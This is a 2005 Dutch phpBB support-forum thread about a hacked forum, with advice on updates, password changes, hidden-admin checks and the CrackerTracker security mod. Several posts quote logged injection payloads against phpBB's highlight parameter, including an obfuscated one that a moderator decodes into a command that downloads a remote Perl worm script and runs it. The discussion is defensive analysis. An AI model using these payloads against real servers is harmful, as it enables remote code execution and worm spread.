het voorkomen van hackers ????

Installatie lukt niet? Plotseling een foutmelding. Of weet je niet hoe iets werkt. Problemen met phpBB2 kun je in dit archief opzoeken.
Forumregels

Sinds 1 januari 2009 wordt phpBB2 niet meer ondersteund.
Onderstaande informatie is verouderd en dient uitsluitend als archief.
phpBB2.0.x
richard m
Berichten: 105
Lid geworden op: 11 mar 2005, 01:59

het voorkomen van hackers ????

Bericht door richard m » 23 aug 2005, 21:45

hoi,

Mijn forum is laatst gehackt.
De hacker is in mijn adminpanel binnen gedrongen,
waarna hij topics begon te verwijderen en alle users.
Ik kan mn forum nu niet meer binnen. Ik heb het van de server afgehaald.
Hoe kan ik nu voorkomen dat mn forum word gehackt ??
Ik had zelfs de laatste update van phpbb uitgevoerd!

Coen
Berichten: 5387
Lid geworden op: 03 aug 2004, 10:25

Bericht door Coen » 23 aug 2005, 21:46

Zorgen dat je forum altijd up-to-date is met de nieuwste phpBB versie maakt de kans op een aanval zo klein mogelijk... :)

richard m
Berichten: 105
Lid geworden op: 11 mar 2005, 01:59

Bericht door richard m » 23 aug 2005, 21:56

maar zijn er misschien ook beveiligings mod's

en weten jullie misschien hoe een hacker in de account van een admin komt??

Gebruikersavatar
Paul
Beheerder
Beheerder
Berichten: 20316
Lid geworden op: 23 okt 2003, 11:38
Locatie: Utrecht
Contacteer:

Bericht door Paul » 23 aug 2005, 22:13

Welke versie van phpbb gebruikte je?

Just me...
Berichten: 64
Lid geworden op: 16 jul 2005, 20:45

Bericht door Just me... » 23 aug 2005, 22:14

Hoe kan ik nu voorkomen dat mn forum word gehackt ??
Nooit geen paswoorden doorgeven, zeker niet van ftp programma's
Nooit premodded files gebruiken, ze zijn onbetrouwbaar (ik zeg niet allemaal, maar meestal toch)

maar zijn er misschien ook beveiligings mod's
er zijn er genoeg, kijk maar eens op http://www.phphacks.com
zoek eens in de categorieën, daar moet je er wel tegenkomen.
en weten jullie misschien hoe een hacker in de account van een admin komt??
Dat zal ik niet zeggen voordat iedereen denkt dat ik een hacker ben :roll: :lol:

Gebruikersavatar
Paul
Beheerder
Beheerder
Berichten: 20316
Lid geworden op: 23 okt 2003, 11:38
Locatie: Utrecht
Contacteer:

Bericht door Paul » 23 aug 2005, 22:16

Ik ben ook geen hacker, maar ik kan het soms toch ;)
En waarom zou je geen premodded gebruiken? Een aantal zijn even goed als de normale phpbb kwa beveiliging ;)

Just me...
Berichten: 64
Lid geworden op: 16 jul 2005, 20:45

Bericht door Just me... » 23 aug 2005, 22:19

paulus schreef:Ik ben ook geen hacker, maar ik kan het soms toch ;)
En waarom zou je geen premodded gebruiken? Een aantal zijn even goed als de normale phpbb kwa beveiliging ;)
kenissen met slechte ervaringen :cry:

Gebruikersavatar
Paul
Beheerder
Beheerder
Berichten: 20316
Lid geworden op: 23 okt 2003, 11:38
Locatie: Utrecht
Contacteer:

Bericht door Paul » 23 aug 2005, 22:33

Welke premodded dan? phpbbfm ofzo zeker :P

Gebruikersavatar
Stef
Berichten: 9080
Lid geworden op: 04 jun 2003, 20:47

Bericht door Stef » 23 aug 2005, 22:54

Even voor de duidelijkheid, de suggestie word gewekt dat sommige in het admin paneel kunnen komen. Maar dit kan men alleen als het forum niet up-to-date is of de admin het wachtwoord laat slingeren of erg logisch is.

Robru
Berichten: 34
Lid geworden op: 06 feb 2004, 18:28
Contacteer:

Bericht door Robru » 23 aug 2005, 22:57

richard m schreef:maar zijn er misschien ook beveiligings mod's
Een extra beveiliging in de vorm van CrackerTracker van CBack is bij mij een welkome aanvulling gebleken.
Regelmatig worden dit soort pogingen gelogd op mijn phpbb 2.0.17 versie:

Code: Selecteer alles

23.08.2005, 15:07 64.203.x.x Mozilla/4.0  p=22365&highlight=\'.system(getenv(http_php)).\' 

Gebruikersavatar
Paul
Beheerder
Beheerder
Berichten: 20316
Lid geworden op: 23 okt 2003, 11:38
Locatie: Utrecht
Contacteer:

Bericht door Paul » 23 aug 2005, 23:04

Enkele tijd geledenen gebeurde dat elke minuut, alleen werden er maar een paar door de ctracker geconstateerd en blokeert. Hij ziet ze dus niet altijd

Robru
Berichten: 34
Lid geworden op: 06 feb 2004, 18:28
Contacteer:

Bericht door Robru » 23 aug 2005, 23:08

Oké, dat kan ik begrijpen, al is het wel zo dat zij iedere maand met nieuwe automatische updates uitkomen...
Maar het is toch tegen niet onverstanding om deze en andere beveiligings MODS te installeren?
'Niet geschoten, is altijd mis!'

Gebruikersavatar
Paul
Beheerder
Beheerder
Berichten: 20316
Lid geworden op: 23 okt 2003, 11:38
Locatie: Utrecht
Contacteer:

Bericht door Paul » 23 aug 2005, 23:11

Das wel waar, maar hetgeen ik wil zeggen is, dat deze niet 100% waterdicht zijn.

Gebruikersavatar
Montana
Berichten: 222
Lid geworden op: 19 jul 2004, 17:09
Locatie: Hellevoetsluis
Contacteer:

Bericht door Montana » 23 aug 2005, 23:15

vaak is het zo...

als je iets echt wil lukt het toch wel :?
is het met hacken of diefstal of wat dan ook...
Gaat het niet zoals het moet,
dan moet het maar zoals het gaat.
Montanas corner
Chat-united

Gebruikersavatar
Paul
Beheerder
Beheerder
Berichten: 20316
Lid geworden op: 23 okt 2003, 11:38
Locatie: Utrecht
Contacteer:

Bericht door Paul » 24 aug 2005, 08:34

Ik geloof voor sommige wel

Gebruikersavatar
mosymuis
Berichten: 6940
Lid geworden op: 05 feb 2003, 14:00
Locatie: Amsterdam
Contacteer:

Bericht door mosymuis » 24 aug 2005, 15:34

richard m schreef:Hoe kan ik nu voorkomen dat mn forum word gehackt ??
Nu je weet dat er mensen zijn binnen gekomen, is het zaak alle wachtwoorden te wijzigen. Database, Control Panel, FTP accounts, admin accounts. Daarnaast ga je na of er extra scripts zijn geinstalleerd op je webserver (hier kan je je host ook om vragen) en of er verborgen admin gebruikers zijn (SELECT username FROM phpbb_users WHERE user_level=1;).

richard m schreef:maar zijn er misschien ook beveiligings mod's
:arrow: http://www.phpbb.nl/viewtopic.php?t=7829

ik ben gek
Berichten: 1496
Lid geworden op: 25 mei 2005, 14:09

Bericht door ik ben gek » 24 aug 2005, 18:12

goed topic mossymuis... binnenkort wat te doen :?

Php
Berichten: 687
Lid geworden op: 21 mei 2003, 01:46
Locatie: Achterhoek
Contacteer:

Bericht door Php » 21 okt 2005, 22:30

Dat CTRACKER is inderdaad een goed hulpmiddel zeg. Zo had ik gisteren 59 aanvallen in het logbestand staan, en vandaag al 140.

Soms staat er duidelijk "drop table" in de aanval, maar meestal zijn het codes als deze, geen idee wat het betekent.

Code: Selecteer alles

p=3602&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)
%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)
%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)
%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)%252echr(114)
%252echr(105)%252echr(120)%252echr(105)%252echr(116)%252echr(46)%252echr(99)
%252echr(111)%252echr(109)%252echr(46)%252echr(97)%252echr(117)%252echr(47)
%252echr(112)%252echr(111)%252echr(114)%252echr(116)%252echr(97)%252echr(46)
%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)
%252echr(114)%252echr(108)%252echr(32)%252echr(112)%252echr(111)%252echr(114)
%252echr(116)%252echr(97)%252echr(46)%252echr(116)%252echr(120)%252echr(116))
%252e%2527

Php
Berichten: 687
Lid geworden op: 21 mei 2003, 01:46
Locatie: Achterhoek
Contacteer:

Bericht door Php » 21 okt 2005, 22:39

Er is overigens ook een hack voor het telkens opnieuw versleutelen van wachtwoorden:

http://www.phpbbhacks.com/download/5586

Gebruikersavatar
mosymuis
Berichten: 6940
Lid geworden op: 05 feb 2003, 14:00
Locatie: Amsterdam
Contacteer:

Bericht door mosymuis » 24 okt 2005, 15:26

Php schreef:Soms staat er duidelijk "drop table" in de aanval, maar meestal zijn het codes als deze, geen idee wat het betekent.

Code: Selecteer alles

system(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)
%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)
%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)
%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)
%252echr(114)%252echr(105)%252echr(120)%252echr(105)%252echr(116)
%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(46)
%252echr(97)%252echr(117)%252echr(47)%252echr(112)%252echr(111)
%252echr(114)%252echr(116)%252echr(97)%252echr(46)%252echr(116)
%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)
%252echr(114)%252echr(108)%252echr(32)%252echr(112)%252echr(111)
%252echr(114)%252echr(116)%252echr(97)%252echr(46)%252echr(116)
%252echr(120)%252echr(116))
Hier staat:

Code: Selecteer alles

system('cd /tmp;w get http://rixit.com.au/porta.txt;perl porta.txt')
"w get" moet aan elkaar, maar komt niet door de phpbb.nl veiligheidscontrole?

Wat zoveel betekent als: voer deze shell commando's uit > navigeer naar de temporary directory > download "http://rixit.com.au/porta.txt" en sla deze op in de huidige directory > voer het zojuist gedownloade bestand "porta.txt" uit met de Perl compiler. Het gaat hier dus een worm, welke automatisch de instructies op het genoemde webadres laat uitvoeren en zo een keten van phpbb forums hackt.

Gesloten